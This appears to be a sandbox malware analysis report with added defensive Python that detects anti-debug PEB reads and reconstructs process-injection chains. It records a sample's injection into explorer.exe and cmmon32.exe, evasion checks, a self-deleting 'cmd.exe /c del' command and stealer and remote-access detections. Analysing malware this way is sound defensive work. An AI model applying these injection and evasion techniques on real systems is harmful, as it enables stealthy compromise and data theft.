          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188A8E4 mov eax, dword ptr fs:[00000030h]3_2_0188A8E4
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FC8F9 mov eax, dword ptr fs:[00000030h]3_2_017FC8F9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FC8F9 mov eax, dword ptr fs:[00000030h]3_2_017FC8F9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184C810 mov eax, dword ptr fs:[00000030h]3_2_0184C810
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186483A mov eax, dword ptr fs:[00000030h]3_2_0186483A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186483A mov eax, dword ptr fs:[00000030h]3_2_0186483A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EE8C0 mov eax, dword ptr fs:[00000030h]3_2_017EE8C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01856870 mov eax, dword ptr fs:[00000030h]3_2_01856870
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01856870 mov eax, dword ptr fs:[00000030h]3_2_01856870
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184E872 mov eax, dword ptr fs:[00000030h]3_2_0184E872
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184E872 mov eax, dword ptr fs:[00000030h]3_2_0184E872
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C0887 mov eax, dword ptr fs:[00000030h]3_2_017C0887
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BCB7E mov eax, dword ptr fs:[00000030h]3_2_017BCB7E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01874BB0 mov eax, dword ptr fs:[00000030h]3_2_01874BB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01874BB0 mov eax, dword ptr fs:[00000030h]3_2_01874BB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186EBD0 mov eax, dword ptr fs:[00000030h]3_2_0186EBD0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EEB20 mov eax, dword ptr fs:[00000030h]3_2_017EEB20
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EEB20 mov eax, dword ptr fs:[00000030h]3_2_017EEB20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0184CBF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017EEBFC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017C8BF0 mov eax, dword ptr fs:[00000030h] (3 identical rows)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h] (9 identical rows)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_01888B28 mov eax, dword ptr fs:[00000030h] (2 identical rows)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017C0BCD mov eax, dword ptr fs:[00000030h] (3 identical rows)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017E0BCB mov eax, dword ptr fs:[00000030h] (3 identical rows)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017D0BBE mov eax, dword ptr fs:[00000030h] (2 identical rows)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_01868B42 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_01856B40 mov eax, dword ptr fs:[00000030h] (2 identical rows)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0188AB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_01874B4B mov eax, dword ptr fs:[00000030h] (2 identical rows)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0186EB50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_01894A80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017FCA6F mov eax, dword ptr fs:[00000030h] (3 identical rows)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_01816AA4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017D0A5B mov eax, dword ptr fs:[00000030h] (2 identical rows)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h] (7 identical rows)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017FCA38 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017E4A35 mov eax, dword ptr fs:[00000030h] (2 identical rows)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_01816ACC mov eax, dword ptr fs:[00000030h] (3 identical rows)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017EEA2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017FCA24 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017FAAEE mov eax, dword ptr fs:[00000030h] (2 identical rows)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0184CA11 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017C0AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017F4AD0 mov eax, dword ptr fs:[00000030h] (2 identical rows)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017C8AA0 mov eax, dword ptr fs:[00000030h] (2 identical rows)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0186EA60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017F8A90 mov edx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0183CA72 mov eax, dword ptr fs:[00000030h] (2 identical rows)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017CEA80 mov eax, dword ptr fs:[00000030h] (9 identical rows)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_01894DAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017C8D59 mov eax, dword ptr fs:[00000030h] (5 identical rows)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017C0D59 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_001F5649 GetCurrentProcessId,OpenProcess,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetLastError,FreeLibrary,GetLastError,OpenEventW,SetEvent,CloseHandle,GetLastError,GetLastError
Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_001F7020 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_001F71B0 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Memory allocated: page read and write | page guard
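The `mov eax, dword ptr fs:[00000030h]` rows above are the sandbox's static detection of PEB reads: on 32-bit Windows, fs:[0x30] is the TEB's pointer to the PEB, and reading it is the first step of the BeingDebugged / NtGlobalFlag debugger checks. The Python below is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: it scans raw code bytes for the two encodings of that instruction (A1 moffs32 for eax, 8B /r with a disp32 ModRM for any register) and decodes the two PEB fields such a read is typically followed by. The CODE and PEB byte strings are constructed for the example; the field offsets are the documented 32-bit TEB/PEB layout.

```python
"""Find 32-bit PEB/TEB reads (mov r32, fs:[disp32]) in raw code bytes.

Added example, not from the report. Shows the encodings behind the
"mov eax, dword ptr fs:[00000030h]" rows and the PEB fields they feed.
"""
import struct

REG32 = ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")
FS_OFFSETS = {0x18: "TEB self pointer", 0x30: "PEB pointer"}   # 32-bit TEB layout
PEB_BEING_DEBUGGED = 0x02   # BYTE, set by the kernel while a debugger is attached
PEB_NT_GLOBAL_FLAG = 0x68   # DWORD in the 32-bit PEB
FLG_HEAP_DEBUG = 0x70       # HEAP_ENABLE_TAIL_CHECK | HEAP_ENABLE_FREE_CHECK | HEAP_VALIDATE_PARAMETERS

# Constructed sample: the classic 32-bit BeingDebugged / NtGlobalFlag probe.
CODE = bytes([
    0x64, 0xA1, 0x30, 0x00, 0x00, 0x00,        # mov eax, fs:[30h]
    0x8A, 0x40, 0x02,                          # mov al, [eax+2]    (BeingDebugged)
    0x64, 0x8B, 0x15, 0x30, 0x00, 0x00, 0x00,  # mov edx, fs:[30h]
    0x8B, 0x42, 0x68,                          # mov eax, [edx+68h] (NtGlobalFlag)
    0x64, 0x8B, 0x0D, 0x18, 0x00, 0x00, 0x00,  # mov ecx, fs:[18h]  (TEB)
    0xC3,                                      # ret
])


def find_fs_reads(code, base=0):
    """Return (address, register, fs_offset, meaning) for every mov r32, fs:[disp32]
    whose displacement is a TEB/PEB pointer slot."""
    hits, i, n = [], 0, len(code)
    while i < n:
        if code[i] == 0x64:                          # FS segment-override prefix
            if i + 6 <= n and code[i + 1] == 0xA1:   # A1 moffs32: destination is always eax
                disp = struct.unpack_from("<I", code, i + 2)[0]
                if disp in FS_OFFSETS:
                    hits.append((base + i, "eax", disp, FS_OFFSETS[disp]))
                    i += 6
                    continue
            # 8B /r with ModRM mod=00, rm=101 -> [disp32]; the reg field names the destination
            if i + 7 <= n and code[i + 1] == 0x8B and (code[i + 2] & 0xC7) == 0x05:
                reg = REG32[(code[i + 2] >> 3) & 7]
                disp = struct.unpack_from("<I", code, i + 3)[0]
                if disp in FS_OFFSETS:
                    hits.append((base + i, reg, disp, FS_OFFSETS[disp]))
                    i += 7
                    continue
        i += 1
    return hits


def peb_debug_indicators(peb):
    """Decode the two PEB fields a fs:[30h] read is usually followed by."""
    flag = struct.unpack_from("<I", peb, PEB_NT_GLOBAL_FLAG)[0]
    return {"BeingDebugged": bool(peb[PEB_BEING_DEBUGGED]),
            "NtGlobalFlag": flag,
            "heap_debug_flags": bool(flag & FLG_HEAP_DEBUG)}


def make_peb(being_debugged=False, nt_global_flag=0):
    """Constructed PEB snapshot (first 0x70 bytes only), for the example."""
    peb = bytearray(0x70)
    peb[PEB_BEING_DEBUGGED] = 1 if being_debugged else 0
    struct.pack_into("<I", peb, PEB_NT_GLOBAL_FLAG, nt_global_flag)
    return bytes(peb)


if __name__ == "__main__":
    for addr, reg, off, meaning in find_fs_reads(CODE, base=0x017C6A50):
        print(f"{addr:08X}  mov {reg}, dword ptr fs:[{off:08X}h]  ; {meaning}")
    print(peb_debug_indicators(make_peb(being_debugged=True, nt_global_flag=0x70)))
```

Run over a dumped 32-bit image, `find_fs_reads` reproduces the row list above (pass the image base so the addresses line up with the `3_2_...` function ids); the `peb_debug_indicators` output is what a sample sees when those reads run under a user-mode debugger, which is why the report's separate "Checks if the current process is being debugged" signature fires.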

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Memory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | NtQueueApcThread: Indirect: 0x12DA4F2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | NtClose: Indirect: 0x12DA56C
Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Section loaded: NULL target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Section loaded: NULL target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Thread register set: target process: 4084
Source: C:\Windows\SysWOW64\cmmon32.exe | Thread register set: target process: 4084
Source: C:\Windows\SysWOW64\cmmon32.exe | Thread register set: target process: 3272
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 1F0000
Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000
Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000
Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: FC0008
Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe "C:\Users\user\AppData\Local\Temp\AddInProcess32.exe"
Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\AddInProcess32.exe"
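Read together, the rows above are the evidence for the whole injection chain: VFylJFPzqX.exe allocates RWX memory at 0x400000 in its own child AddInProcess32.exe and writes an MZ header there (classic PE injection into a freshly started process), AddInProcess32.exe then maps executable sections into explorer.exe and cmmon32.exe, queues an APC in explorer.exe and unmaps cmmon32.exe's image, and cmmon32.exe finally maps into a second explorer.exe and deletes the dropped file. The Python below is an added example, not part of the Joe Sandbox report or of any tool it names: it parses rows in exactly this extracted form (including the missing space after ".exe" and the "Jump to behavior" link label), groups them by (source, target) and labels the technique each pair shows. The row grammar is inferred from these rows only, and BEHAVIOR_ROWS is copied from them; where a row names only a PID (the "Thread register set" rows) the PID is kept as the target key because the row gives no image name.

```python
"""Reconstruct the injection chain from Joe Sandbox style behavior rows.

Added example; not part of the original report or of Joe Sandbox. The row
grammar (Source / event / target / base / protect / value) is inferred from
the HIPS / PFW rows of the report; BEHAVIOR_ROWS is copied from those rows.
"""
import re
from collections import defaultdict

# Rows as extracted from the report, link label and missing spaces included.
BEHAVIOR_ROWS = [
    r"Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and writeJump to behavior",
    r"Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior",
    r"Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread register set: target process: 4084Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 1F0000Jump to behavior",
    r"Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior",
]

EVENTS = ("Memory allocated", "Memory written", "Section loaded",
          "Section unmapped", "Thread APC queued", "Thread register set")
ROW_RE = re.compile(r"^Source:\s*(?P<src>.+?\.exe)\s*(?P<event>" + "|".join(EVENTS) + r"):\s*(?P<rest>.*)$")
MEM_RE = re.compile(r"^(?P<target>.+?)\s+base:\s+(?P<base>[0-9A-Fa-f]+)"
                    r"(?:\s+protect:\s+(?P<protect>.+?))?"
                    r"(?:\s+value starts with:\s+(?P<value>[0-9A-Fa-f]+))?\s*$")
SECTION_RE = re.compile(r"^\S+\s+target:\s+(?P<target>.+?)\s+protection:\s+(?P<protect>.+?)\s*$")
UNMAP_RE = re.compile(r"^(?P<target>.+?)\s+base address:\s+(?P<base>[0-9A-Fa-f]+)\s*$")
PROC_RE = re.compile(r"^target process:\s+(?P<target>.+?)\s*$")
SUB_RE = {"Memory allocated": MEM_RE, "Memory written": MEM_RE, "Section loaded": SECTION_RE,
          "Section unmapped": UNMAP_RE, "Thread APC queued": PROC_RE, "Thread register set": PROC_RE}

TAG_PE_IN_RWX = "MZ header written into an RWX allocation at the same base (PE injection / hollowing)"
TAG_SECTION = "executable section mapped into the target"
TAG_APC = "APC queued in the target"
TAG_UNMAP = "target image section unmapped"
TAG_CTX = "thread context modified in the target"


def parse_row(row):
    """Turn one extracted row into a dict, or None if it is not an injection row."""
    row = row.replace("Jump to behavior", "").strip()   # link label left by extraction
    m = ROW_RE.match(row)
    if not m:
        return None
    event = m.group("event")
    sub = SUB_RE[event].match(m.group("rest").strip())
    if not sub:
        return None
    rec = {"src": m.group("src"), "event": event, "base": None, "protect": None, "value": None}
    rec.update(sub.groupdict())
    return rec


def basename(path):
    return path.rsplit("\\", 1)[-1]


def is_rwx(protect):
    p = (protect or "").lower()
    return "execute" in p and "write" in p


def classify(events):
    """Label the technique(s) that one (source, target) pair's events add up to."""
    tags = []
    rwx_bases = {e["base"] for e in events if e["event"] == "Memory allocated" and is_rwx(e["protect"])}
    mz_bases = {e["base"] for e in events
                if e["event"] == "Memory written" and (e["value"] or "").upper().startswith("4D5A")}
    if rwx_bases & mz_bases:                     # RWX region that then receives a PE header
        tags.append(TAG_PE_IN_RWX)
    if any(e["event"] == "Section loaded" and is_rwx(e["protect"]) for e in events):
        tags.append(TAG_SECTION)
    if any(e["event"] == "Thread APC queued" for e in events):
        tags.append(TAG_APC)
    if any(e["event"] == "Section unmapped" for e in events):
        tags.append(TAG_UNMAP)
    if any(e["event"] == "Thread register set" for e in events):
        tags.append(TAG_CTX)
    return tags


def report(rows):
    """Group rows by (source image, target image or PID) and classify each pair."""
    pairs = defaultdict(list)
    for row in rows:
        rec = parse_row(row)
        if rec:
            pairs[(basename(rec["src"]), basename(rec["target"]))].append(rec)
    return {pair: classify(evs) for pair, evs in pairs.items()}


if __name__ == "__main__":
    for (src, dst), tags in report(BEHAVIOR_ROWS).items():
        print(f"{src} -> {dst}: " + "; ".join(tags))
```

The verdict for a pair is deliberately built from two independent rows (an RWX allocation and an MZ write at the same base) rather than from either one alone: a JIT or packer allocating RWX in its own process is common, a PE header landing in another process's RWX region is not. The same grouping makes the "Thread register set" rows stand out as unresolved PIDs, which is the cue to match them against the process list elsewhere in the report.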
Source: explorer.exe, 00000004.00000003.2284166438.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1462669782.0000000001091000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.1462669782.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1462391746.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2359671123.0000000000A20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.1462669782.0000000001091000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: 0Program Manager
Source: explorer.exe, 00000010.00000002.2660398665.00000000012D9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: *Progman-
Source: explorer.exe, 00000004.00000000.1462669782.0000000001091000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000010.00000002.2670266703.0000000004FE0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004FE0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004FE0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ProgmanER\S-1-5c
Source: explorer.exe, 00000004.00000003.2284166438.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2364455621.000000000936E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd]1Q
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_001F61CA GetLocaleInfoW,CmAtolW,GetNumberFormatW,lstrlenW,CmIsDigitW
Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Queries volume information: C:\Users\user\Desktop\VFylJFPzqX.exe VolumeInformation
Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_001F73D5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

Source: Yara match | File source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

Source: Yara match | File source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix, listed per tactic. The number in parentheses after a technique is the signature-count badge as extracted; techniques without a number are the matrix's unmarked cells.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server
Initial Access: Valid Accounts (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
Execution: Shared Modules (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
Persistence: Valid Accounts (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Privilege Escalation: Valid Accounts (1); Access Token Manipulation (1); Process Injection (712); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Defense Evasion: Masquerading (1); Valid Accounts (1); Access Token Manipulation (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (151); Process Injection (712); Deobfuscate/Decode Files or Information (1); Hidden Files and Directories (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (4); Software Packing (11); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
Discovery: System Time Discovery (1); Security Software Discovery (341); Process Discovery (2); Virtualization/Sandbox Evasion (151); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (223); System Owner/User Discovery; Network Sniffing; Network Service Discovery; System Network Connections Discovery; Process Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
